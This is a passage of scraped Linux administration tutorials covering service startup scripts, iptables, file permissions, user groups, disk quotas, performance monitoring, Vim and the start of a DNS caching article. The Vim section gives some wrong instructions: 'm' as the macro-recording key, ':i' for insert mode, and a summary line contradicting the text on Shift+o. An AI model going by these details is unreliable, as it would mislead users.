root         1   0.0    0.1   2828    1400  ?     Ss   Feb08   0:02 /sbin/init
root         2   0.0    0.0      0       0  ?     S    Feb08   0:00 [kthreadd]
root         3   0.0    0.0      0       0  ?     S    Feb08   0:00 [migration/0]
root         4   0.0    0.0      0       0  ?     S    Feb08   0:00 [ksoftirqd/0]
root         5   0.0    0.0      0       0  ?     S    Feb08   0:00 [watchdog/0]
root         6   0.0    0.0      0       0  ?     S    Feb08   0:00 [events/0]
root         7   0.0    0.0      0       0  ?     S    Feb08   0:00 [cpuset]
root         8   0.0    0.0      0       0  ?     S    Feb08   0:00 [khelper]
root         9   0.0    0.0      0       0  ?     S    Feb08   0:00 [netns]
root        10   0.0    0.0      0       0  ?     S    Feb08   0:00 [async/mgr]
root        11   0.0    0.0      0       0  ?     S    Feb08   0:00 [pm]
root        12   0.0    0.0      0       0  ?     S    Feb08   0:00 [sync_supers]
apache   17250   0.0    0.9  37036    10224 ?     S    Feb08   0:00 /usr/sbin/httpd
apache   25686   0.0    0.9  37168    10244 ?     S    Feb08   0:00 /usr/sbin/httpd
apache   28290   0.0    0.9  37168    10296 ?     S    Feb08   0:00 /usr/sbin/httpd
postfix   30051  0.0    0.2  10240     2136 ?     S    23:35   0:00 pickup -l -t fifo -u
postfix   30060  0.0    0.2  10308     2280 ?     S    23:35   0:00 qmgr -l -t fifo -u
root      31645  0.1    0.3  11120     3112 ?     Ss   23:45   0:00 sshd: root@pts/1


The following command will list all start-up scripts for RunLevel 3 (Full multiuser mode):

[root@gateway~]# ls -l /etc/rc.d/rc3.d/S*     
OR
[root@gateway~]# ls -l /etc/rc3.d/S*          

Here is an example output of the above commands:

[root@gateway~]# ls -l /etc/rc.d/rc3.d/S*
lrwxrwxrwx. 1 root root 23 Jan 16 17:45 /etc/rc.d/rc3.d/S00microcode_ctl -> ../init.d/microcode_ctl
lrwxrwxrwx. 1 root root 17 Jan 16 17:44 /etc/rc.d/rc3.d/S01sysstat -> ../init.d/sysstat
lrwxrwxrwx. 1 root root 22 Jan 16 17:44 /etc/rc.d/rc3.d/S02lvm2-monitor -> ../init.d/lvm2-monitor
lrwxrwxrwx. 1 root root 19 Jan 16 17:39 /etc/rc.d/rc3.d/S08ip6tables -> ../init.d/ip6tables
lrwxrwxrwx. 1 root root 18 Jan 16 17:38 /etc/rc.d/rc3.d/S08iptables -> ../init.d/iptables
lrwxrwxrwx. 1 root root 17 Jan 16 17:42 /etc/rc.d/rc3.d/S10network -> ../init.d/network
lrwxrwxrwx. 1 root root 16 Jan 27 01:04 /etc/rc.d/rc3.d/S11auditd -> ../init.d/auditd
lrwxrwxrwx. 1 root root 21 Jan 16 17:39 /etc/rc.d/rc3.d/S11portreserve -> ../init.d/portreserve
lrwxrwxrwx. 1 root root 17 Jan 16 17:44 /etc/rc.d/rc3.d/S12rsyslog -> ../init.d/rsyslog
lrwxrwxrwx. 1 root root 18 Jan 16 17:45 /etc/rc.d/rc3.d/S13cpuspeed -> ../init.d/cpuspeed
lrwxrwxrwx. 1 root root 20 Jan 16 17:40 /etc/rc.d/rc3.d/S13irqbalance -> ../init.d/irqbalance
lrwxrwxrwx. 1 root root 17 Jan 16 17:38 /etc/rc.d/rc3.d/S13rpcbind -> ../init.d/rpcbind
lrwxrwxrwx. 1 root root 19 Jan 16 17:43 /etc/rc.d/rc3.d/S15mdmonitor -> ../init.d/mdmonitor
lrwxrwxrwx. 1 root root 20 Jan 16 17:38 /etc/rc.d/rc3.d/S22messagebus -> ../init.d/messagebus


To disable services, you can either stop a running service or change the configuration in a way that the service will not start on the next reboot. To stop a running service, RedHat/CentOS users can use the command -

 [root@gateway~]# service service-name stop The example below shows the command used to stop our Apache web service (httpd):
[root@gateway~]# service httpd stop
Stopping httpd: [  OK  ]

In order to stop the service from starting up at boot time, you could use -

  [root@gateway~]# /sbin/chkconfig --levels 2345 service-name off  Where 'service-name' is replaced by the name of the service. e.g httpd    

You can also remove a service from the startup script by using the following commands which will remove the httpd (Apache Web server) service:

[root@gateway~]# /bin/mv /etc/rc.d/rc3.d/S85httpd /etc/rc.d/rc3.d/K85httpd 

or

[root@gateway~]# /bin/mv /etc/rc3.d/S85httpd /etc/rc3.d/K85httpd

During startup on of the Linux operating system, the rc program looks in the /etc/rc.d/rc3.d directory (when configured with Runlevel 3),  executing any K* scripts with an option of stop. Then, all the S* scripts are started with an option of start. Scripts are started in numerical order—thus, the S08iptables script is started before the S85httpd script. This allows you to choose exactly when your script starts without having to edit files. The same rule applies with the K* scripts.

In some rare cases, services may have to be removed from /etc/xinetd.d or /etc/inetd.conf file.

Debian users can use the following commands to stop, start and restart a service -

$ sudo service httpd stop
$ sudo service httpd start   
$ sudo service httpd restart       

Remove the startup script by using the following commands:

[root@gateway~]# /bin/mv /etc/rc.d/rc3.d/S85httpd /etc/rc.d/rc3.d/K85httpd

or

[root@gateway~]# /bin/mv /etc/rc3.d/S85httpd /etc/rc3.d/K85httpd

Host-based Firewall Protection with IPtables

Using iptables firewall, you could limit access to your server by IP address or by host/domain name. RedHat/CentOS users have a file /etc/sysconfig/iptables based on the services that were ‘allowed’ during installation. The file can be edited to accept some services and block others. In case the requested service does not match any of the ACCEPT lines in the iptables file, the packet is logged and then rejected.

RedHat/CentOS/Fedora users will have to install the iptables with:

[root@gateway~]# yum install iptables

Debian users will need to install the iptables with the help of:

$ sudo apt-get install iptables

Then use the iptables command line options/switches to implement the policy. The rules of iptables usually take the form:   
•    INIVIDUAL REJECTS FIRST
•    THEN OPEN IT UP
•    BLOCK ALL

As it is a table of rules, the first rule takes precedence. If the first rule dis-allows everything nothing else following later will matter.

In practice, a firewall script is needed which is created using the following sequence:
1) Create your script
2) Make it executable
3) Run the script

Following are the commands used for the above order:

[root@gateway~]# vim /root/firewall.sh   
[root@gateway~]# chmod 755 /root/firewall.sh   
[root@gateway~]# /root/firewall.sh             

Updating the firewall script is simply a matter of re-editing to make the necessary changes and running it again. Since iptables does not run as a daemon, instead of stopping, the rules are only flushed with the '-F' option: 

[root@gateway~]# iptables -F INPUT
[root@gateway~]# iptables -F OUTPUT
[root@gateway~]# iptables -F FORWARD
[root@gateway~]# iptables -F POSTROUTING -t nat
[root@gateway~]# iptables -F PREROUTING -t nat

At startup/reboot, all that is needed is to execute the script to flush the iptables rules. The simplest way to do this is to add the script (/root/firewall.sh) to the file /etc/rc.local file.

Best Practices

Apart from the above, a number of steps need to be taken to keep your Linux server safe from outside attackers. Key files should be checked for security and must be set to root for both owner and group:

/etc/fstab
/etc/passwd
/etc/shadow
/etc/group

The above should be owned by root and and their permission must be 644 (rw-r--r--), except /etc/shadow which should have the permission of 400 (r--------).

You can read more on how to set permissions on your Linux files in our Linux File & Folder Permissions article

Limiting Root Access

Implement a password policy, which forces users to change their login passwords, for example, every 60 to 90 days, starts warning them within 7 days of expiry, and accepts passwords that are a minimum of 14 characters in length.

Root access must be limited by using the following commands for RedHat/CentOS/Fedora -

[chris@gateway~]$ su -
Password: <enter root password>
[root@gateway ~]#

Or for RedHat/CentOS/Fedora/Debian:

[chris@gateway~]$ sudo -i
Password: <enter root password>
[root@gateway ~]#

Provide the password of the user, who can assume root privileges.

Only root should be able to access CRON. Cron is a system daemon used to execute desired tasks (in the background) at designated times.

A crontab is a simple text file with a list of commands meant to be run at specified times. It is edited with a command-line utility. These commands (and their run times) are then controlled by the cron daemon, which executes them in the system background. Each user has a crontab file which specifies the actions and times at which they should be executed, these jobs will run regardless of whether the user is actually logged into the system. There is also a root crontab for tasks requiring administrative privileges. This system crontab allows scheduling of systemwide tasks (such as log rotations and system database updates). You can use the man crontab command to find more information about it.

Lastly, the use of SSH is recommended instead of Telnet for remote accesses. The main difference between the two is that SSH encrypts all data exchanged between the user and server, while telnet sends all data in clear-text, making it extremely easy to obtain root passwords and other sensitive information. All unused TCP/UDP ports must also be blocked using IPtables.

  • Hits: 30394

Understanding, Administering Linux Groups and User Accounts

In a multi-user environment like Linux, every file is owned by a user and a group. There can be others as well who may be allowed to work with the file. What this means is, as a user, you have all the rights to read, write and execute a file created by you. Now, you may belong to a group, so you can give your group members the permission to either read, write (modify) and/or execute your file. In the same way, for those who do not belong to your group, and are called 'others', you may give similar permissions.

How are these permissions shown and how are they modified?

In a shell, command line or within a terminal, if you type 'ls -l', you will see something like the following:

drwxr-x--- 3 tutor firewall  4096 2010-08-21 15:52 Videos
-rwxr-xr-x 1 tutor firewall    21 2010-05-10 10:02 Doom-TNT

The last group of words on the right is the name of the file or directory. Therefore, 'Videos' is a directory, which is designated by the ’d’ at the start of the line. Since 'Doom-TNT' shows only a '-', at the start of the line, it is a file. The following series of 'rwx...' are the permissions of the file or directory. You will notice that there are three sets of 'rwx'. The first three rwx are the read, write and execute permissions for the owner 'tutor'.

Since the r, w and x are present, it means the owner has all the permissions. The next set of 'rwx' is permissions for the group, which is the second 'username'. You will notice that the 'w' here is missing, and is replaced by a '-'. This means group members of the group 'username' have permissions to read and to execute 'Doom-TNT', but cannot write to it or modify it. Permission for 'others' is the same. Therefore, others can also read and execute the file, but not write to it or modify it. Others do not have any permissions for the directory 'Videos' and hence cannot read (enter), modify or execute 'Videos'.

You can use the 'chmod' command to change the permissions you give. The basic form of the command looks like:

chmod 'who'+/-'permissions' 'filename'

Here, the 'filename' is the file, whose permissions are being modified. You are giving the permissions to 'who', and 'who' can be u=user (meaning you), g=group, o=others, or a=all.

The 'permissions' you give can be r=read, w=write, x=execute or 'space' for no permissions. Using a '+' grants the permission, and a '-' removes it.

As an example, the command 'chmodo+r Videos' will result in:

drwxr-xr-- 3 username  4096 2010-08-21 15:52 Videos

and now 'others' can read 'Videos'. Similarly, 'chmod o-r Videos', will set it back as it was, before the modification.

Linux file and folder permissions are covered extensively on our dedicated Linux File & Folder permissions article.

What Happens In A GUI environment?

If you are using a file manager like Nautilus, you will find a 'view' menu, which has an entry 'Visible Columns'. This opens up another window showing the visible columns that you can select to allow the file manager to show. You will find there are columns like 'Owner', 'Group' and 'Permissions'. By turning these columns ON, you can see the same information as with the 'ls -l' command.

If you want to modify the permissions of any file from Nautilus, you will have to right-click on the file with your mouse. This will open up a window through which you can access the 'properties' of the file. In the properties window, you can set or unset any of the permissions for owner, group and others.

What Are Group IDs?

Because Linux is a multi-user system, there could be several users logged in and using the system. The system needs to keep track of who is using what resources. This is primarily done by allocating identification numbers or IDs to all users and groups. To see the IDs, you may enter the command 'id', which will show you the user ID, the group ID and the IDs of the groups to which you belong.

A standard Linux installation, for example Ubuntu, comes with some groups preconfigured. Some of these are:

4(adm), 20(dialout), 21(fax), 24(cdrom), 26(tape), 29(audio), 30(dip), 44(video), 46(plugdev), 104(fuse), 106(scanner), 114(netdev), 116(lpadmin), 118(admin), 125(sambashare)

The numbers are the group IDs and their names are given inside brackets. Unless you are a member of a specific group, you are not allowed to use that resource. For example, unless you belong to the group 'cdrom', you will not be allowed to access the contents of any CDs and DVDs that are mounted on the system.

In Linux, the 'root' or 'super user', also called the 'administrator', is a user who is a member of all the groups and has all permissions in all places, unless specifically changed. Users who have been granted root privileges defined in the 'sudoers' file, can assume root status temporarily with the 'sudo' command.

  • Hits: 49962

Understanding Linux File System Quotas - Installation and Setup

When you are running your own web hosting, it is important to monitor how much space is being used by each user. This is not a simple task to be done manually since one of the users or group could fill up the whole hard disk, preventing others from availing any space. Therefore, it is important to allow each user or group their own hard disk space called quota and locking them out from using more than what is allotted.

The system administrator sets a limit or a disk quota to restrict certain aspects of the file system usage on a Linux operating system. In multi-user environments, disk quotas are very useful since a large number of users have access to the file system. They may be logging into the system directly or using their disk space remotely. They may also be accessing their files through NFS or through Samba. If several users host their websites on your web space, you need to implement the quota system.

How to Install Linux Quota

For installing a quota system, for example, in your Debian or RedHAT Linux system, you will need two tools called ‘quota’ and ‘quotatool’. At the time of installation of these tools, you will be asked if you wish to send daily reminders to users who are going over their quotas.

Now, the administrator also needs to know the users that are going over their quota. The system will send an email to this effect, therefore the email address of the administrator has to be inputted next.

In case the user does not know what to do if the system gives him a warning message, the next entry is the contact number of the administrator. This will be displayed to the user along with the warning message. With this, the quota system installation is completed.

At this time, a user and a group have to be created and proper permissions given. For creating, you have to assume root status, and type the following commands:

# touch /aquota.user /aquota.group
# chmod 600 /aquota.*

Next, these have to be mounted in the proper place on the root file system. For this, an entry has to be made in the ‘fstab’ file in the directory /etc. In the ‘fstab’ file, the root entry has to be modified with:

noatime,nodiratime,usrjquota=aquota.user,grpjquota=aquota.group,jqfmt=vfsv0

Next, the computer has to be rebooted, or the file system remounted with the command:

# mount -o remount /

 The system is now able to work with disk quotas. However, you have to allow the system to build/rebuild its table of current disk usage. For this, you must first run quotacheck.

This will examine all the quota-enabled file systems, and build a table of the current disk usage for each one. The operating system’s copy of the disk usage is then updated. In addition, this creates the disk quota files for the entire file system. If the quota already existed, they are updated. The command looks like:

# quotacheck -avugm

 Some explanation is necessary here. The (-a) tells the command that all locally mounted quota-enabled file systems are to be checked. The (-v) is to display the status information as the check proceeds. The (-u) is to enable checking the user disk quota information. The (-g) is to enable checking the group disk quota information. Finally, the (-m) tells the command not to try to remount file system read-only.

After checking and building the disk-quota files is over, the disk-quotas have to be turned on. This is done by the command ‘quotaon’ to inform the system that disk-quota should be enabled, such as:

# quotaon -avug

Here, (-a) forces all file systems in /etc/fstab to enable their quotas. The (-v) displays status information for each file system. The (-u) is for enabling the user quota. The (-g) enables the group quota.

Define Quota for Each User/Group

Now that the system is ready with quotas, you can start defining what each user or group gets as his limit. Two types of limits can be defined. One is the soft limit and the other is the hard limit. To set the two limits try editing the size and inode size with:

# edquota -u $USER

This allows you to edit the following line:

/dev/sda1   1024  200000  400000 1024 0    0

Here, the soft limit is 200000 (200MB) and the hard limit is 400000 (400MB). You may change it to suit your user (denoted by $USER).

The soft limit has a grace period of 7 days by default. It can be changed to days, hours, minutes, or seconds as desired by:

# edquota -t

This allows you to edit the line below. It has been modified to change the default to 15 minutes:

/dev/sda1                 15minutes                  7days


For editing group quota use:

# edquota -g $GROUP

Quota Status Report

Now that you have set a quota, it is easy to create a mini report on how much space a user has used. For this use the command:

root@gateway [~]# repquota  -a

*** Report for user quotas on device /dev/vzfs
Block grace time: 00:00; Inode grace time: 00:00
                            Block  limits                      File limits
User         used    soft    hard  grace    used  soft  hard  grace
---------------------------------------------------------------------
root        --  5578244       0       0     117864     0     0      
bin         --    30936       0       0        252     0     0      
mail        --       76       0       0         19     0     0      
nobody      --        0       0       0          3     0     0      
mailnull    --     3356       0       0        157     0     0      
smmsp       --        4       0       0          2     0     0      
named       --      860       0       0         11     0     0      
rpc         --        0       0       0         1      0     0      
mailman     --    40396       0       0       2292     0     0      
dovecot     --        4       0       0          1     0     0      
mysql       --   181912       0       0        857     0     0      
firewall    --    92023      153600 153600     21072   0     0      
#55         --     1984       0       0         74     0     0      
#200        --     1104       0       0         63     0     0      
#501        --     6480       0       0         429    0     0      
#506        --      648       0       0         80     0     0      
#1000       --     7724       0        0       878     0     0      
#50138      --    43044       0        0      3948     0     0

Once the user and group quotas are setup, it is simple to manage your storage. Therefore you do not allow users to hog all of the disk space. By using disk quotas, you force your users to be tidier, and users and groups of users will not fill their home directories with junk or old documents that are no longer needed.

  • Hits: 33769

Linux System Resource & Performance Monitoring

You may be a user at home, a user in a LAN (local area network), or a system administrator of a large network of computers. Alternatively, you may be maintaining a large number of servers with multiple hard drives. Whatever may be your function, monitoring your Linux system is of paramount importance to keep it running in top condition.

While monitoring a complex computer system, some of the basic things to be kept in mind are the utilization of the hard disk, memory or RAM, CPU, the running processes, and the network traffic. Analysis of the information made available during monitoring is necessary, since all the resources are limited. Reaching the limits or exceeding them on any of the resources could lead to severe consequences, which may even be catastrophic.

Monitoring The Hard Disk Space

Use a simple command like:

$ df -h

This results in the output:

Filesystem                Size          Used         Avail     Use%       Mounted on

/dev/sda1                 22G          5.0G          16G      24%         /

/dev/sda2                 34G           23G          9.1G     72%         /home

This shows there are two partitions (1 & 2) of the hard disk sda, which are currently at 24% and 72% utilization. The total size is shown in gigabytes (G). How much is used and balance available is shown as well. However, checking each hard disk to see the percentage used can be a big drag. It is better that the system checks the disks and informs you by email if there is a potential danger. Bash scripts may be written for this and run at specific times as a cron job.

For the GUI, there is a graphical tool called ‘Baobab’ for checking the disk usage. It shows how a disk is being used and displays the information in the form of either multicolored concentric rings or boxes.

Monitoring Memory Usage

RAM or memory is used to run the current application. Under Linux, there are a number of ways you can check the used memory space -- both in static and dynamic conditions.

For a static snapshot of the memory, use ‘free -m’ which results in the output:

$ free -m
                        total   used   free   shared   buffers  cached

Mem:                    1998    1896    101    0        59       605

-/+ buffers/cache:      1231    766

Swap:                   290     77         213

Here, the total amount of RAM is depicted in megabytes (MB), along with cache and swap. A somewhat more detailed output can be obtained by the command ‘vmstat’:

root@gateway [~]#  vmstat
procs   -----------memory-------- --- ---swap--  ----io----    --system--  -----cpu------
 r    b    swpd    free    buff  cache    si       so         bi    bo      in     cs    us  sy  id  wa  st
 1    0      0    767932    0      0      0        0          10     3      0     1      2   0   97   0   0
root@gateway [~]#

However, if a dynamic situation of what is happening to the memory is to be examined, you have to use ‘top’ or ‘htop’. Both will give you a picture of which process is using what amount of memory and the picture will be updated periodically. Both ‘top’ and ‘htop’ will also show the CPU utilization, tasks running and their PID. Whereas ‘top’ has a purely numerical display, ‘htop’ is somewhat more colorful and has a semi-graphic look. There is also a list of command menus at the bottom for set up and specific operations.

root@gateway [~]# top

top - 01:04:18 up 81 days, 11:05,  1 user,  load average: 0.08, 0.28, 0.33
Tasks:  47 total,   1 running,  45 sleeping,   0 stopped,   1 zombie
Cpu(s):  2.4%us,  0.4%sy,  0.0%ni, 96.7%id,  0.5%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:    1048576k total,   261740k used,   786836k free,        0k buffers
Swap:         0k total,        0k used,        0k free,        0k cached

  PID    USER     PR   NI  VIRT  RES  SHR S  %CPU   %MEM    TIME+    COMMAND                                
    1   root      15   0  10372  736  624 S  0.0    0.1     1:41.86   init                                   
 5407   root      18   0  12424  756  544 S  0.0    0.1     0:13.71   dovecot                                
 5408   root      15   0  19068 1144  892 S  0.0    0.1     0:12.09   dovecot-auth                           
 5416   dovecot   15   0  38480 2868 2008 S  0.0    0.3     0:10.80   pop3-login                             
 5417   dovecot   15   0  38468 2880 2008 S  0.0    0.3     0:49.31   pop3-login                             
 5418   dovecot   16   0  38336 2700 2020 S  0.0    0.3     0:01.15   imap-login                             
 5419   dovecot   15   0  38484 2856 2020 S  0.0    0.3     0:04.69   imap-login                             
 9745   root      18   0  71548  22m 1400 S  0.0    2.2     0:01.39   lfd                                    
11501  root       15   0   160m  67m 2824 S  0.0    6.6     1:32.51   spamd                                  
23935  firewall   18   0  15276 1180  980 S  0.0    0.1     0:00.00   imap                                   
23948  mailnull   15   0  64292 3300 2620 S  0.0    0.3     0:05.62   exim                                   
23993  root       15   0   141m  49m 2760 S  0.0    4.8     1:00.87   spamd                                  
24477  root       18   0  37480 6464 1372 S  0.0    0.6     0:04.17   queueprocd                             
24494  root       18   0  44524 8028 2200 S  0.0    0.8     1:20.86   tailwatchd                             
24526  root       19   0  92984  14m 1820 S  0.0    1.4     0:00.00   cpdavd                                 
24536  root       33  18  23892 2556  680 S  0.0    0.2     0:02.09   cpanellogd                             
24543  root       18   0  87692  11m 1400 S  0.0    1.1     0:33.87   cpsrvd-ssl                             
25952  named      22   0   349m 8052 2076 S  0.0    0.8    20:17.42   named                                  
26374  root       15  -4  12788  752  440 S  0.0    0.1     0:00.00   udevd                                  
28031  root       17   0  48696 8232 2380 S  0.0    0.8     0:00.07   leechprotect                           
28038  root       18   0  71992 2172  132 S  0.0    0.2     0:00.00   httpd                                  
28524  root       18   0  90944 3304 2584 S  0.0    0.3     0:00.01   sshd

For a graphical display of how the memory is being utilized, the Gnome System Monitor gives a detailed picture. There are other system monitors available under various window managers in Linux.

Monitoring CPU(s)

You may have a single, a dual core, or a quad core CPU in your system. To see what each CPU is doing or how two CPUs are sharing the load, you have to use ‘top’ or ‘htop’. These command line applications show the percentage of each CPU being utilized. You can also see process statistics, memory utilization, uptime, load average, CPU status, process counts, and memory and swap space utilization statistics.

Similar output statistics may be seen by using command line tools such as the ‘mpstat’, which is part of a group package called ‘sysstat’. You may have to install ‘sysstat’ in your system, since it may not be installed by default. Once installed, you can monitor a variety of parameters, for example compare the CPU utilization of an SMP system or multi-processor system.

Finding out if any specific process is hogging the CPU needs a little more command line instruction such as:

$ ps -eo pcpu,pid,user,args | sort -r -k1 | less

OR

$ ps -eo pcpu,pid,user,args | sort -k 1 -r | head -10

Similar output can be obtained by using the command ‘iostat’ as root:

root@gateway [~]# iostat -xtc 5 3
Linux 2.6.18-028stab094.3 (gateway.firewall.cx)         01/11/2012

Time: 01:13:15 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          2.38    0.01     0.43     0.46    0.00     96.72

Time: 01:13:20 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          3.89    0.00     0.26     0.09     0.00     95.77

Time: 01:13:25 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          0.31    0.00    0.15      1.07     0.00     98.47

This will show three outputs every five seconds and show the information since the last reboot.

CPU usage under GUI is very well depicted by the Gnome System Monitor and other system monitoring applications. These are also useful for monitoring remote servers. Detailed memory maps can be accessed, signals can be sent and processes controlled remotely.

linux-system-monitoring-1

Gnome-System-Monitor

Linux Processes

How do you know what processes are currently running in your Linux system? There are innumerable ways of getting to see this information. The handiest applications are the old faithfuls - ‘top’ and ‘htop’. They will give a real-time image of what is going on under the hood. However, if you prefer a more static view, use ‘ps’. To see all processes try ‘ps -A’ or ‘ps -e’:

root@gateway [~]# ps -e
PID TTY          TIME CMD
    1 ?          00:01:41 init
 3201 ?        00:00:00 leechprotect
 3208 ?        00:00:00 httpd
 3360 ?        00:00:00 httpd
 3490 ?        00:00:00 httpd
 3530 ?        00:00:00 httpd
 3532 ?        00:00:00 httpd
 3533 ?        00:00:00 httpd
 3535 ?        00:00:00 httpd
 3575 ?        00:00:00 httpd
 3576 ?        00:00:00 httpd
 3631 ?        00:00:00 imap
 3694 ?        00:00:00 httpd
 3705 ?        00:00:00 httpd
 3770 ?        00:00:00 imap
 3774 pts/0    00:00:00 ps
 5407 ?        00:00:13 dovecot
 5408 ?        00:00:12 dovecot-auth
 5416 ?        00:00:10 pop3-login
 5417 ?        00:00:49 pop3-login
 5418 ?        00:00:01 imap-login
 5419 ?        00:00:04 imap-login
 9745 ?        00:00:01 lfd
11501 ?        00:01:35 spamd
23948 ?        00:00:05 exim
23993 ?        00:01:00 spamd
24477 ?        00:00:04 queueprocd
24494 ?        00:01:20 tailwatchd
24526 ?        00:00:00 cpdavd
24536 ?        00:00:02 cpanellogd
24543 ?        00:00:33 cpsrvd-ssl
25952 ?        00:20:17 named
26374 ?        00:00:00 udevd
28524 ?        00:00:00 sshd
28531 pts/0    00:00:00 bash
29834 ?        00:00:00 sshd
30426 ?        00:11:27 syslogd
30429 ?        00:00:00 klogd
30473 ?        00:00:00 xinetd
30485 ?        00:00:00 mysqld_safe
30549 ?        1-15:07:28 mysqld
32158 ?        00:06:29 httpd
32166 ?        00:12:39 pure-ftpd
32168 ?        00:07:12 pure-authd
32181 ?        00:01:06 crond
32368 ?        00:00:00 saslauthd
32373 ?        00:00:00 saslauthd

PS is an extremely powerful and versatile command, and you can learn more by ‘ps --h’:

root@gateway [~]# ps --h
********* simple selection *********  ********* selection by list *********
-A all processes                         -C by command name
-N negate selection                      -G by real group ID (supports names)
-a all w/ tty except session leaders     -U by real user ID (supports names)
-d all except session leaders            -g by session OR by effective group name
-e all processes                         -p by process ID
T  all processes on this terminal        -s processes in the sessions given
a  all w/ tty, including other users     -t by tty
g  OBSOLETE -- DO NOT USE                -u by effective user ID (supports names)
r  only running processes                 U  processes for specified users
x  processes w/o controlling ttys         t  by tty
*********** output format **********  *********** long options ***********
-o,o user-defined   -f full               --Group --User --pid --cols --ppid
-j,j job control    s  signal             --group --user --sid --rows --info
-O,O preloaded     -o  v  virtual memory  --cumulative --format --deselect
-l,l long              u  user-oriented   --sort --tty --forest --version
-F   extra full        X  registers       --heading --no-heading --context
                    ********* misc options *********
-V,V  show version     L  list format codes   f  ASCII art forest
-m,m,-L,-T,H  threads  S  children in sum    -y change -l format
-M,Z  security data    c  true command name  -c scheduling class
-w,w  wide output      n  numeric WCHAN,UID  -H process hierarchy

  • Hits: 57722

Linux VIM / Vi Editor - Tutorial - Basic & Advanced Features

When you are using Vim, you want to know three things - getting in, moving about and getting out. Of course, while doing these three basic operations, you would like to do something meaningful as well. So, we start with getting into Vim.

Assuming that you are in a shell, or in the command line, you can simply type 'vim' and the application starts:

root@gateway [~]# vim

 Exiting the VIM application is easily accomplished: type ':' followed by a 'q', hit the 'Enter' key and you are out:

~
~                                         VIM - Vi IMproved
~
~                                          version 7.0.237
~                                     by Bram Moolenaar et al.
~                                 Modified by <This email address is being protected from spambots. You need JavaScript enabled to view it.>
~                            Vim is open source and freely distributable
~
~                                   Become a registered Vim user!
~                          type  :help register<Enter>   for information
~
~                          type  :q<Enter>               to exit        
~                          type  :help<Enter>  or  <F1>  for on-line help
~                          type  :help version7<Enter>   for version info
~
:q
root@gateway [~]#

 That's how you start and stop the Vim car. Now, let's try to learn how to steer the car.

You can move around in Vim, using the four arrow keys. However, a faster way is to use the 'h', 'j', 'k' and 'l' keys. This is because the keys are always under your right hand and you do not need to move your hand to access them as with the arrow keys. The 'j' moves the cursor down, 'k' moves it up. The 'h' key moves the cursor left, while 'l' moves it to the right. That's how you steer the Vim car.

You can edit a file using Vim. You either have an existing file, or you make a new one. If you start with 'vim filename', you edit the file represented by the 'filename'. If the file does not exist, Vim will create a new file. Now, if you want to edit a file from within Vim, open the file using ':e filename'. If this file is a new file, Vim will inform you. You can save the file using the ':w' command.

If you need to search the file you are editing for a specific word or string, simply type forward-slash '/' followed by the word you would like to search for. After hitting 'enter', VIM will automatically take you to the first match.  By typing forward-slash '/' again followed by 'enter' it will take you to the next match.

To write or edit something inside the file, you can start by typing ':i' and Vim will enter the 'Insert' mode. Once you have finished, you can exit the Insert mode by pressing the 'Esc' key, and undo the changes you made with ':e!'. You also have a choice to either save the file using the ':w' command, or save & quit by using ':wq'. Optionally, you can abort the changes and quit by ':q!'.

If you have made a change and want to quit without explicitly informing Vim whether you want to save the file or not, Vim will rightly complain, but will also guide you to use the '!'.

Command Summary

Start VIM:  vim
Quit Program: :q
Move Cursor: Arrow keys or j, k, h, l (down, up, left, right)
Edit file: vim filename
Open file (within VIM):  :e filename  e.g   :e bash.rc
Search within file: /'string'  e.g /firewall  
Insert mode:  :i
Save file:   :w
Save and Quit:  :wq
Abort and Quit:  :q!

Advanced Features of VIM

Now that you know your way in and out of Vim, and how to edit a file, let us dig a little deeper. For example, how can you add something at the end of a line, when you are at its starting point? Well, one way is to keep the right arrow pressed, until you get to the end. A faster way is 'Shift+a' and you are at the end of the line. To go to the beginning of the line, you must press 'Shift+i'. Make sure you are out of the 'Insert' mode shown at the bottom; use the 'Esc' for this.

Supposing you are in the middle of a line, and would like to start inserting text into a new line, just below it. One way would be to move the cursor right and hit 'Enter' when you reach the end. A faster way is to enter 'o'. If you enter 'o' or 'shift+o', you can start entering text into the new line created above the cursor. Don't forget to exit the 'Insert' mode by pressing 'Esc'.

How do you delete lines? Hold the 'delete' button and wait until the lines are gone. How can you do it faster? Use the 'd' command. If you want to delete 10 lines below your cursor position and the current line, try 'd10j'. To delete 5 lines above your current position and the current line, try 'd5k'. Note the 'j' and 'k' (down, up) covered in our previous section. If you’ve made a mistake, recover it with the undo command, 'u'. Redo it with 'Ctrl+r'.

Tip 1: To delete the current line alone, use 'dd'.

Tip 2: To delete the current line and the one below it, use 'd2d'.

Did you know you can have windows in Vim? Oh yes, you can. Try 'Ctrl+w+s' if you want a horizontal split, and 'Ctrl+w+v' if you want a vertical split. Move from one window to another by using 'Ctrl+w+w'. After you have finished traveling through all the windows, close them one by one using 'Ctrl+w+c'.

 Here is an example with four (4) windows within the Vim environment:

linux-vim-editor-1

You can record macros in Vim and run them. To record a macro you have to start it with an 'm'. To stop recording it, hit 'q'. To play the macro, press '@m'. To rerun it, press '@'. Macros are most useful when you require to perform the same commands within a file.

Vim also has extensive help facilities. To learn about a command, say 'e', type ':h e' and hit 'Enter'. You will see how the command 'e' can be useful. To come back to where you were, type ‘:q’ and then ‘Enter’. Incidentally, typing ':he' and 'Enter' will open up the general help section. Come back with the same ':q'.

As an example, here's what we got when we typed ':h e' (that's an ":" + "h" + space + "e"):

linux-vim-editor-2

When we typed ':he', we were presented with the main help file of VIM:

linux-vim-editor-3

Command Summary

Move cursor to end of line:  Shift+a
Move cursor to beginning of line:  Shift+o
Delete current line: dd
Delete 10 lines below cursor position: d10j
Delete 5 lines above cursor position: d5k
Undo:  u
Redo: Ctrl+r
Window Mode - Horizontal:  Ctrl+w+s
Window Mode - Vertical Split:  Ctrl+w+v
Move between windows: Ctrl+w+w
Close Window: Ctrl+w+c
Enable Macro recording:  m
Play Macro:  @m
Help:    :h 'command'  from within VIM. e.g  :h e



  • Hits: 60360

Linux BIND DNS - Part 6: Linux BIND - DNS Caching

In the previous articles, we spoke about the Internet Domain Hierarchy and explained how the ROOT servers are the DNS servers, which contain all the information about authoritative DNS servers the domains immediately below e.g firewall.cx, microsoft.com. In fact, when a request is passed to any of the ROOT DNS servers, they will redirect the client to the appropriate authoritative DNS server, that is, the DNS server in charge of the domain.

For example, if you're trying to resolve firewall.cx and your machine contacts a ROOT DNS server, the server will point your computer to the DNS server in charge of the .CX domain, which in turn will point your computer to the DNS server in charge of firewall.cx, currently server with IP 74.200.90.5.

Understanding DNS Caching and its Implications

